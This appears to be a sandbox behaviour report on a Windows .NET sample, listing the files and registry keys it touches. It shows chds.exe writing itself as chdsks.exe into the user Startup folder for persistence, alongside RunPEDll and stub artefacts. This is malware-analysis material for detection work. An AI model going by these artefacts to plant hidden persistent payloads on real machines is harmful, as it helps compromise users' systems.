C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll.exe
C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chdsks.exe
\Device\NamedPipe\
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2100.1266359
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2100.1266359
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2100.1266406
C:\Windows\System32\Branding\Basebrd\Basebrd.dll
C:\Windows\Branding\Basebrd\basebrd.dll
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\Seven01\AppData\Local\Temp\"C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chdsks.exe"
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chdsks.exe.config
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chdsks.exe.Local\
C:\Users\Seven01\AppData\Roaming
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs
C:\Users\Seven01\AppData\Roaming\Microsoft
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chdsks.INI
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\mscorlib.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\mscorlib.resources\mscorlib.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\mscorlib.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\mscorlib.resources\mscorlib.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\chds.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\chds.resources\chds.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\chds.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\chds.resources\chds.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\chds.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\chds.resources\chds.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\chds.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\chds.resources\chds.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunPEDll.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunPEDll\RunPEDll.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunPEDll.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunPEDll\RunPEDll.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\stub.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\stub.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\stub.resources\stub.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\stub.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\stub.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\stub.resources\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\chdskskas.txt
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.Xml.INI
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2312.1271562
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2312.1271562
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2312.1271562
C:\Users\Seven01\AppData\Local\Temp\reg.*
C:\Users\Seven01\AppData\Local\Temp\reg
C:\ProgramData\Oracle\Java\javapath\reg.*
C:\ProgramData\Oracle\Java\javapath\reg
C:\Windows\System32\reg.*
C:\Windows\System32\reg.COM
C:\Windows\System32\reg.exe
C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui
C:\Windows\SysWOW64\ntdll.dll

Read Files

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Users\Seven01\AppData\Local\Temp\chds.exe.config
C:\Users\Seven01\AppData\Local\Temp\chds.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index149.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\System32\l_intl.nls
\Device\KsecDD
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol21.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
\Device\NamedPipe\
C:\Windows\Branding\Basebrd\basebrd.dll
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chdsks.exe.config
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chdsks.exe
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll
C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui
C:\Windows\SysWOW64\ntdll.dll

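Write Files
(chdsks.exe is written to the per-user Startup folder, from which Windows launches it at each logon of that user. This is the persistence indicator in this report.)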

C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chdsks.exe
C:\Users\Seven01\AppData\Local\Temp\chdskskas.txt

Delete Files

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2100.1266359
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2100.1266359
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2100.1266406
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2312.1271562
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2312.1271562
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2312.1271562

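Keys
(Registry paths accessed. The .NETFramework and Fusion entries below are the kind of lookups the .NET runtime itself performs when a managed process starts, so on their own they are weak indicators.)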

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v2.0.50727
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\AppPatch
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chds.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_CURRENT_USER\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\GACChangeNotification\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\31bd1f54\5a317755
HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index21
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
